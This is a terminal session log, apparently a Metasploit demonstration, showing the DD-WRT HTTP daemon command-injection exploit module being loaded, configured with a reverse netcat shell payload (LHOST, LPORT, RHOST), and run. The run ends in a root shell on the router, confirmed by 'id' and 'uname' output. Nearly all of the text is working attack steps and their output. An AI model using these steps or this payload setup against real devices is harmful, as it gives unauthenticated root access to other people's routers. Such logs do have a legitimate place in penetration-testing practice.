msf3$ svn up
A    modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb
Updated to revision 6852.

hdm@vorpal:/downloads/msf19$ ./msfconsole

                 |                    |      _) |
 __ `__ \   _ \  __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|


       =[ msf v3.3-dev
+ -- --=[ 401 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 176 aux

msf > use exploit/linux/http/ddwrt_cgibin_exec
msf exploit(ddwrt_cgibin_exec) > info

       Name: DD-WRT HTTP Daemon Arbitrary Command Execution
    Version: 6852
   Platform: Unix
 Privileged: No
    License: Metasploit Framework License (BSD)

Provided by:
  hdm <hdm@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic Target

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST  192.168.0.10     yes       The target address
  RPORT  80               yes       The target port

Payload information:
  Space: 1024

Description:
  This module abuses a metacharacter injection vulnerability in the
  HTTP management server of wireless gateways running DD-WRT. This
  flaw allows an unauthenticated attacker to execute arbitrary
  commands as the root user account.

References:
  http://www.securityfocus.com/bid/35742
  http://www.milw0rm.com/exploits/9209

msf exploit(ddwrt_cgibin_exec) > show payloads

Compatible payloads
===================

  Name                      Description
  ----                      -----------
  cmd/unix/bind_netcat      Unix Command Shell, Bind TCP (via netcat -e)
  cmd/unix/bind_perl        Unix Command Shell, Bind TCP (via perl)
  cmd/unix/bind_ruby        Unix Command Shell, Bind TCP (via Ruby)
  cmd/unix/generic          Unix Command, Generic command execution
  cmd/unix/reverse          Unix Command Shell, Double reverse TCP (telnet)
  cmd/unix/reverse_bash     Unix Command Shell, Reverse TCP (/dev/tcp)
  cmd/unix/reverse_netcat   Unix Command Shell, Reverse TCP (via netcat -e)
  cmd/unix/reverse_perl     Unix Command Shell, Reverse TCP (via perl)
  cmd/unix/reverse_ruby     Unix Command Shell, Reverse TCP (via Ruby)
  generic/shell_bind_tcp    Generic Command Shell, Bind TCP Inline
  generic/shell_reverse_tcp Generic Command Shell, Reverse TCP Inline

msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(ddwrt_cgibin_exec) > set LHOST 192.168.0.139
LHOST => 192.168.0.139
msf exploit(ddwrt_cgibin_exec) > set LPORT 4444
LPORT => 4444
msf exploit(ddwrt_cgibin_exec) > set RHOST 192.168.0.10
RHOST => 192.168.0.10
msf exploit(ddwrt_cgibin_exec) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Sending GET request with encoded command line...
[*] Command shell session 1 opened (192.168.0.139:4444 -> 192.168.0.10:2057)

id
uid=0(root) gid=0(root)

uname -a
Linux wifi1 2.4.36 #308 Sun Jul 27 16:11:05 CEST 2008 mips unknown